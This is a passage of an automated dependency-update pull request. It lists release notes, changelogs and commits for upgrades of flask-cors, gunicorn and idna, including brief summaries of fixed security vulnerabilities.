href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/381\"\u003ecorydolphin/flask-cors#381\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coren-frankel\"\u003e\u003ccode\u003e@​coren-frankel\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/369\"\u003ecorydolphin/flask-cors#369\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kkirsche\"\u003e\u003ccode\u003e@​kkirsche\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/371\"\u003ecorydolphin/flask-cors#371\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/corydolphin/flask-cors/compare/5.0.0...5.0.01\"\u003ehttps://github.com/corydolphin/flask-cors/compare/5.0.0...5.0.01\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e5.0.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBreaking: Change default to disable private network access by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/368\"\u003ecorydolphin/flask-cors#368\u003c/a\u003e\nThis effectively resolves  \u003ca href=\"https://github.com/advisories/GHSA-hxwh-jpp2-84pm\"\u003ehttps://github.com/advisories/GHSA-hxwh-jpp2-84pm\u003c/a\u003e \u003ca href=\"https://osv.dev/vulnerability/PYSEC-2024-71\"\u003ehttps://osv.dev/vulnerability/PYSEC-2024-71\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/corydolphin/flask-cors/compare/4.0.2...5.0.0\"\u003ehttps://github.com/corydolphin/flask-cors/compare/4.0.2...5.0.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.0.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump requests from 2.31.0 to 2.32.0 in /docs by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/358\"\u003ecorydolphin/flask-cors#358\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBackwards Compatible Fix for CVE-2024-6221 by \u003ca href=\"https://github.com/adrianosela\"\u003e\u003ccode\u003e@​adrianosela\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/363\"\u003ecorydolphin/flask-cors#363\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd unit tests for Private-Network by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/367\"\u003ecorydolphin/flask-cors#367\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/358\"\u003ecorydolphin/flask-cors#358\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/adrianosela\"\u003e\u003ccode\u003e@​adrianosela\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/363\"\u003ecorydolphin/flask-cors#363\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/corydolphin/flask-cors/compare/4.0.1...4.0.2\"\u003ehttps://github.com/corydolphin/flask-cors/compare/4.0.1...4.0.2\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/corydolphin/flask-cors/blob/main/CHANGELOG.md\"\u003eflask-cors's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChange Log\u003c/h1\u003e\n\u003ch2\u003e4.0.1\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAddress \u003ca href=\"https://github.com/advisories/GHSA-84pr-m4jr-85g5\"\u003eCVE-2024-1681\u003c/a\u003e which is a log injection vulnerability when the log level is set to debug by \u003ca href=\"https://github.com/aneshujevic\"\u003e\u003ccode\u003e@​aneshujevic\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/351\"\u003ecorydolphin/flask-cors#351\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.0.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove support for Python versions older than 3.8 by \u003ca href=\"https://github.com/WAKayser\"\u003e\u003ccode\u003e@​WAKayser\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/330\"\u003ecorydolphin/flask-cors#330\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd GHA tooling by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/331\"\u003ecorydolphin/flask-cors#331\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.01\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInclude examples to specify that schema and port must be included in … by \u003ca href=\"https://github.com/YPCrumble\"\u003e\u003ccode\u003e@​YPCrumble\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/294\"\u003ecorydolphin/flask-cors#294\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003etwo small changes to the documentation, based on issue \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/290\"\u003e#290\u003c/a\u003e by \u003ca href=\"https://github.com/bbbart\"\u003e\u003ccode\u003e@​bbbart\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/291\"\u003ecorydolphin/flask-cors#291\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix typo by \u003ca href=\"https://github.com/sunarch\"\u003e\u003ccode\u003e@​sunarch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/304\"\u003ecorydolphin/flask-cors#304\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFIX: typo in CSRF by \u003ca href=\"https://github.com/sattamjh\"\u003e\u003ccode\u003e@​sattamjh\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/315\"\u003ecorydolphin/flask-cors#315\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTest against recent Python versions by \u003ca href=\"https://github.com/pylipp\"\u003e\u003ccode\u003e@​pylipp\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/314\"\u003ecorydolphin/flask-cors#314\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCorrect spelling mistakes by \u003ca href=\"https://github.com/EdwardBetts\"\u003e\u003ccode\u003e@​EdwardBetts\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/311\"\u003ecorydolphin/flask-cors#311\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e'Access-Control-Allow-Private-Network = true' header for http response by \u003ca href=\"https://github.com/chelo-kjml\"\u003e\u003ccode\u003e@​chelo-kjml\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/318\"\u003ecorydolphin/flask-cors#318\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: Fix a few typos by \u003ca href=\"https://github.com/timgates42\"\u003e\u003ccode\u003e@​timgates42\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/323\"\u003ecorydolphin/flask-cors#323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Docs] Fix typo in configuration documentation by \u003ca href=\"https://github.com/sachit-shroff\"\u003e\u003ccode\u003e@​sachit-shroff\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/316\"\u003ecorydolphin/flask-cors#316\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.10\u003c/h2\u003e\n\u003cp\u003eAdds support for PPC64 and ARM64 builds for distribution. Thanks \u003ca href=\"https://github.com/sreekanth370\"\u003e\u003ccode\u003e@​sreekanth370\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e3.0.9\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eEscape path before evaluating resource rules (thanks to Colby Morgan). Prior to this, flask-cors incorrectly\nevaluated CORS resource matching before path expansion. E.g. \u0026quot;/api/../foo.txt\u0026quot; would incorrectly match resources for\n\u0026quot;/api/*\u0026quot; whereas the path actually expands simply to \u0026quot;/foo.txt\u0026quot;\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.8\u003c/h2\u003e\n\u003cp\u003eFixes : DeprecationWarning: Using or importing the ABCs from 'collections' in Python 3.7.\nThank you \u003ca href=\"https://github.com/juanmaneo\"\u003e\u003ccode\u003e@​juanmaneo\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/jdevera\"\u003e\u003ccode\u003e@​jdevera\u003c/code\u003e\u003c/a\u003e for the contribution.\u003c/p\u003e\n\u003ch2\u003e3.0.7\u003c/h2\u003e\n\u003cp\u003eUpdated logging.warn to logging.warning (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/234\"\u003e#234\u003c/a\u003e) Thanks Vaibhav\u003c/p\u003e\n\u003ch2\u003e3.0.6\u003c/h2\u003e\n\u003cp\u003eManual error in release process. Identical contents at 3.0.5.\u003c/p\u003e\n\u003ch2\u003e3.0.5\u003c/h2\u003e\n\u003cp\u003eFixes incorrect handling of regexes containing \u003ccode\u003e[\u003c/code\u003e, and a few other special characters. Fixes Issue \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/212\"\u003e#212\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e3.0.4\u003c/h2\u003e\n\u003cp\u003eHandle response.headers being None. (Fixes issue \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/217\"\u003e#217\u003c/a\u003e)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/35d875319621bd129a38b2b823abf4a2f6cda536\"\u003e\u003ccode\u003e35d8753\u003c/code\u003e\u003c/a\u003e [CVE-2024-6844] Replace use of (urllib) unquote_plus with unquote for paths (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/e970988bea563e05e8b8f53fa7bcc134b5bf5c5f\"\u003e\u003ccode\u003ee970988\u003c/code\u003e\u003c/a\u003e [CVE-2024-6839] Sort Paths by Regex Specificity (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/391\"\u003e#391\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/eb39516a3c96b90d0ae5f51293972395ec3ef358\"\u003e\u003ccode\u003eeb39516\u003c/code\u003e\u003c/a\u003e [CVE-2024-6866] Case Sensitive Request Path Matching (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/390\"\u003e#390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/5da9be479b4fb203816bca9eb0cfb7add5eeceb5\"\u003e\u003ccode\u003e5da9be4\u003c/code\u003e\u003c/a\u003e Fix packaging: missing source files (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/381\"\u003e#381\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/65a51321e1be9a4320b39f67db5e63553cd8138b\"\u003e\u003ccode\u003e65a5132\u003c/code\u003e\u003c/a\u003e Workaround license publishing issue (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/380\"\u003e#380\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/7127e7e3914083fbe4ebd8f7ef9b3ae0e8459daa\"\u003e\u003ccode\u003e7127e7e\u003c/code\u003e\u003c/a\u003e Always use trusted publishing (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/379\"\u003e#379\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/01e2e68268f7fdb4ed7309a655986b85c9066a67\"\u003e\u003ccode\u003e01e2e68\u003c/code\u003e\u003c/a\u003e Fix release pipeline (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/378\"\u003e#378\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/ade65a16524c628747aecaaa73c1d615501974b2\"\u003e\u003ccode\u003eade65a1\u003c/code\u003e\u003c/a\u003e Major Packaging Refactor: migrate to uv (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/377\"\u003e#377\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/eb44bffc76f49e5bb8692e96a37e11ebee070cf0\"\u003e\u003ccode\u003eeb44bff\u003c/code\u003e\u003c/a\u003e fix: typos (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/371\"\u003e#371\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/1225e7806156de61f343928c227e32bbff44059e\"\u003e\u003ccode\u003e1225e78\u003c/code\u003e\u003c/a\u003e replace documentation links in README (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/369\"\u003e#369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/corydolphin/flask-cors/compare/3.0.3...6.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gunicorn` from 19.7.1 to 23.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/benoitc/gunicorn/releases\"\u003egunicorn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e23.0.0\u003c/h2\u003e\n\u003cp\u003eGunicorn 23.0.0 has been released. This version improve HTTP 1.1. support and  which improve safety\u003c/p\u003e\n\u003cp\u003eYou're invited to upgrade asap your own installation.\u003c/p\u003e\n\u003ch1\u003e23.0.0 - 2024-08-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eminor docs fixes (:pr:\u003ccode\u003e3217\u003c/code\u003e, :pr:\u003ccode\u003e3089\u003c/code\u003e, :pr:\u003ccode\u003e3167\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eworker_class parameter accepts a class (:pr:\u003ccode\u003e3079\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003efix deadlock if request terminated during chunked parsing (:pr:\u003ccode\u003e2688\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003epermit receiving Transfer-Encodings: compress, deflate, gzip (:pr:\u003ccode\u003e3261\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003epermit Transfer-Encoding headers specifying multiple encodings. note: no parameters, still (:pr:\u003ccode\u003e3261\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003esdist generation now explicitly excludes sphinx build folder (:pr:\u003ccode\u003e3257\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003edecode bytes-typed status (as can be passed by gevent) as utf-8 instead of raising \u003ccode\u003eTypeError\u003c/code\u003e (:pr:\u003ccode\u003e2336\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eraise correct Exception when encounting invalid chunked requests (:pr:\u003ccode\u003e3258\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003ethe SCRIPT_NAME and PATH_INFO headers, when received from allowed forwarders, are no longer restricted for containing an underscore (:pr:\u003ccode\u003e3192\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003einclude IPv6 loopback address \u003ccode\u003e[::1]\u003c/code\u003e in default for :ref:\u003ccode\u003eforwarded-allow-ips\u003c/code\u003e and :ref:\u003ccode\u003eproxy-allow-ips\u003c/code\u003e (:pr:\u003ccode\u003e3192\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e** NOTE **\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe SCRIPT_NAME change mitigates a regression that appeared first in the 22.0.0 release\u003c/li\u003e\n\u003cli\u003eReview your :ref:\u003ccode\u003eforwarded-allow-ips\u003c/code\u003e setting if you are still not seeing the SCRIPT_NAME transmitted\u003c/li\u003e\n\u003cli\u003eReview your :ref:\u003ccode\u003eforwarder-headers\u003c/code\u003e setting if you are missing headers after upgrading from a version prior to 22.0.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e** Breaking changes **\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erefuse requests where the uri field is empty (:pr:\u003ccode\u003e3255\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003erefuse requests with invalid CR/LR/NUL in heade field values (:pr:\u003ccode\u003e3253\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eremove temporary \u003ccode\u003e--tolerate-dangerous-framing\u003c/code\u003e switch from 22.0 (:pr:\u003ccode\u003e3260\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eIf any of the breaking changes affect you, be aware that now refused requests can post a security problem, especially so in setups involving request pipe-lining and/or proxies.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eFix CVE-2024-1135\u003c/p\u003e\n\u003ch2\u003eGunicorn 22.0 has been released\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eGunicorn 22.0.0 has been released.\u003c/strong\u003e This version fix the numerous security vulnerabilities. You're invited to upgrade asap your own installation.\u003c/p\u003e\n\u003cp\u003eChanges:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e22.0.0 - 2024-04-17\n===================\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003eutime\u003c/code\u003e to notify workers liveness\u003c/li\u003e\n\u003cli\u003emigrate setup to pyproject.toml\u003c/li\u003e\n\u003cli\u003efix numerous security vulnerabilities in HTTP parser (closing some request smuggling vectors)\u003c/li\u003e\n\u003cli\u003eparsing additional requests is no longer attempted past unsupported request framing\u003c/li\u003e\n\u003cli\u003eon HTTP versions \u0026lt; 1.1 support for chunked transfer is refused (only used in exploits)\u003c/li\u003e\n\u003cli\u003erequests conflicting configured or passed SCRIPT_NAME now produce a verbose error\u003c/li\u003e\n\u003cli\u003eTrailer fields are no longer inspected for headers indicating secure scheme\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/411986d6191114dd1d1bbb9c72c948dbf0ef0425\"\u003e\u003ccode\u003e411986d\u003c/code\u003e\u003c/a\u003e fix doc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/334392e7795f2017e83f7054d372422512d6f4b6\"\u003e\u003ccode\u003e334392e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/2559\"\u003e#2559\u003c/a\u003e from laggardkernel/bugfix/reexec-env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/e75c3533e32f91a9dceba9e8e1341fea5540ba81\"\u003e\u003ccode\u003ee75c353\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/3189\"\u003e#3189\u003c/a\u003e from pajod/patch-py36\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/9357b28dd867950e33ca3864207cb35a1eb8ba6f\"\u003e\u003ccode\u003e9357b28\u003c/code\u003e\u003c/a\u003e keep document user in access_log_format setting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/79fdef0822cbfe7e16b659b07230af9be098d5fc\"\u003e\u003ccode\u003e79fdef0\u003c/code\u003e\u003c/a\u003e bump to 23.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/3acd9fbfd1159ca3cd80a8052ada89a0bf27f806\"\u003e\u003ccode\u003e3acd9fb\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/2620\"\u003e#2620\u003c/a\u003e from talkerbox/improve-access-log-format-docs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/3f56d76548e4ade034bf5e174737902970285d1f\"\u003e\u003ccode\u003e3f56d76\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/3192\"\u003e#3192\u003c/a\u003e from pajod/patch-allowed-script-name\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/256d474a7910bd605f2cc8c082b79c1ae55215a9\"\u003e\u003ccode\u003e256d474\u003c/code\u003e\u003c/a\u003e docs: revert duped directive\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/ffa48b581dcaa75f17fd2df263515e4266feeef6\"\u003e\u003ccode\u003effa48b5\u003c/code\u003e\u003c/a\u003e test: default change was intentional\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/52538ca9070b5e7ead5d0fa731e82a622dc6f3ee\"\u003e\u003ccode\u003e52538ca\u003c/code\u003e\u003c/a\u003e docs: recommend SCRIPT_NAME=/subfolder\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/benoitc/gunicorn/compare/19.7.1...23.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 2.6 to 3.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could take exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/kjd/idna/compare/v3.6...v3.7\"\u003ehttps://github.com/kjd/idna/compare/v3.6...v3.7\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.7 (2024-04-11)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could\ntake exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e3.6 (2023-11-25)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression to include tests in source distribution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.5 (2023-11-24)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.1.0\u003c/li\u003e\n\u003cli\u003eString codec name is now \u0026quot;idna2008\u0026quot; as overriding the system codec\n\u0026quot;idna\u0026quot; was not working.\u003c/li\u003e\n\u003cli\u003eFix typing error for codec encoding\u003c/li\u003e\n\u003cli\u003e\u0026quot;setup.cfg\u0026quot; has been added for this release due to some downstream\nlack of adherence to PEP 517. Should be removed in a future release\nso please prepare accordingly.\u003c/li\u003e\n\u003cli\u003eRemoved reliance on a symlink for the \u0026quot;idna-data\u0026quot; tool to comport\nwith PEP 517 and the Python Packaging User Guide for sdist archives.\u003c/li\u003e\n\u003cli\u003eAdded security reporting protocol for project\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks Jon Ribbens, Diogo Teles Sant'Anna, Wu Tingfeng for contributions\nto this release.\u003c/p\u003e\n\u003cp\u003e3.4 (2022-09-14)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.0.0\u003c/li\u003e\n\u003cli\u003eMigrate to pyproject.toml for build information (PEP 621)\u003c/li\u003e\n\u003cli\u003eCorrect another instance where generic exception was raised instead of\nIDNAError for malformed input\u003c/li\u003e\n\u003cli\u003eSource distribution uses zeroized file ownership for improved\nreproducibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Seth Michael Larson for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.3 (2021-10-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 14.0.0\u003c/li\u003e\n\u003cli\u003eUpdate to in-line type annotations\u003c/li\u003e\n\u003cli\u003eThrow IDNAError exception correctly for some malformed input\u003c/li\u003e\n\u003cli\u003eAdvertise support for Python 3.10\u003c/li\u003e\n\u003cli\u003eImprove testing regime on Github\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d\"\u003e\u003ccode\u003e1d365e1\u003c/code\u003e\u003c/a\u003e Release v3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c1b3154939907fab67c5754346afaebe165ce8e6\"\u003e\u003ccode\u003ec1b3154\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/172\"\u003e#172\u003c/a\u003e from kjd/optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0394ec76ff022813e770ba1fd89658790ea35623\"\u003e\u003ccode\u003e0394ec7\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/cd58a23173d2b0a40b95ee680baf3e59e8d33966\"\u003e\u003ccode\u003ecd58a23\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/152\"\u003e#152\u003c/a\u003e from elliotwutingfeng/dev\u003c/li\u003e\n\u003cli\u003e\u003ca 